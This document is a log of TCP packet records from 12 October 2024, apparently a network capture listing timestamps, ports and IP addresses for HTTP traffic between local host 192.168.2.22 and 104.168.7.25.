Oct 12, 2024 16:39:57.440126896 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440144062 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440157890 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440166950 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440181971 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440181971 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440191031 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440200090 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440211058 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440222025 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440222979 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440238953 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440241098 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440254927 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440264940 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440270901 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440284014 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440288067 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440293074 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440306902 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440310955 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440321922 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440334082 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440339088 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440344095 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440355062 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440360069 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440371990 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440378904 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440387964 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440390110 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440407038 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440411091 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440424919 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440433025 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440440893 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440449953 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440457106 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440494061 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440494061 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440502882 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440522909 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440536022 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440537930 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440557957 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440566063 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440582037 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440599918 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440618992 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440634012 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440649986 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440663099 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440674067 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440677881 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440694094 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440694094 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440706015 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440710068 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440728903 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440762043 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440773010 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440776110 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440787077 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440792084 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440805912 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.440819025 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440829992 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440829992 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.440850019 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.495317936 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.495404005 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.495407104 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.495429039 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.495445967 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.495461941 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.495465040 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.495479107 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.495493889 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.495510101 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.495551109 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.495589972 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.527559042 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.527633905 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.527651072 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.527666092 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.527674913 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.527682066 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.527708054 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.527724028 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.527740002 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.527748108 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.527762890 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.527762890 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.527782917 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.527802944 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.527812004 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.527823925 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.527842045 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.527858019 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.527868032 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.527868032 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.527884007 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.527920008 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.527920961 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.527937889 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.527954102 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.527965069 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.527971029 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.527991056 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528011084 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528014898 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528029919 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528053999 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528054953 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528070927 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528096914 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528136969 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528203964 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528222084 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528238058 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528253078 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528269053 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528271914 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528283119 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528287888 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528296947 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528305054 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528321981 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528323889 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528331041 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528340101 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528352022 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528357029 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528364897 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528384924 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528387070 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528393984 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528403044 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528419971 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528428078 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528448105 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528458118 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528512955 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528528929 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528544903 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528561115 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528567076 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528567076 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528578997 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528587103 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528605938 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528608084 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528615952 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528623104 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528639078 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528654099 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528669119 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528670073 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528693914 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528697968 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528697968 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528709888 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528722048 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528726101 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528743982 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528747082 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528747082 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528747082 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528759956 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528759956 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528778076 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528784037 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528795004 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528806925 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528812885 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528820038 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528841019 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528856039 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528872013 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528881073 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528897047 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528898001 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528912067 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528937101 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528938055 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528958082 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528959036 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528985023 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.528985023 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.528995991 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529001951 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529019117 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529022932 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529035091 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529046059 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529052019 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529063940 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529068947 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529083014 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529087067 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529094934 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529103041 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529119015 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529128075 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529140949 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529140949 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529174089 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529191017 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529217958 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529222965 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529226065 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529238939 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529282093 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529293060 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529308081 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529325008 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529350042 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529350042 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529361963 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529438972 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529460907 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529476881 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529486895 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529493093 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529508114 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529510021 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529526949 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529552937 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529568911 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529568911 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529577971 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529587030 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529589891 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529603958 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529619932 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529620886 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529632092 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529637098 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529652119 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529653072 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529664040 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529670954 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529675961 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529686928 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529697895 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529711962 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529731035 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529752970 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529767990 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529783010 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529798031 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529800892 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529814005 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529822111 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529828072 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529839993 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529849052 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529861927 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529865980 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529881954 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529890060 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529898882 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529906034 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529915094 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529927969 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529930115 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529948950 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529953957 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529953957 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529966116 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.529966116 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529983044 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.529993057 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.530006886 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.530031919 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.530031919 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.584790945 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.584872961 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.584896088 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.584896088 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.584913969 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.584929943 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.584938049 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.584950924 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.584952116 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.584968090 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.584985018 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.584985018 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.585007906 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.585007906 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617188931 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617261887 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617388964 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617405891 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617420912 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617436886 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617450953 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617468119 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617484093 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617484093 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617491961 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617502928 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617518902 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617535114 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617543936 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617556095 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617559910 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617575884 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617577076 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617593050 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617597103 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617610931 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617624998 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617630005 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617639065 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617649078 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617660046 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617664099 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617676973 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617686033 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617688894 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617707014 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617712021 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617727995 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617733955 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617743015 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617757082 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617768049 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617770910 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617785931 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617798090 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617814064 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617820978 CEST	49170	80	192.168.2.22	104.168.7.25
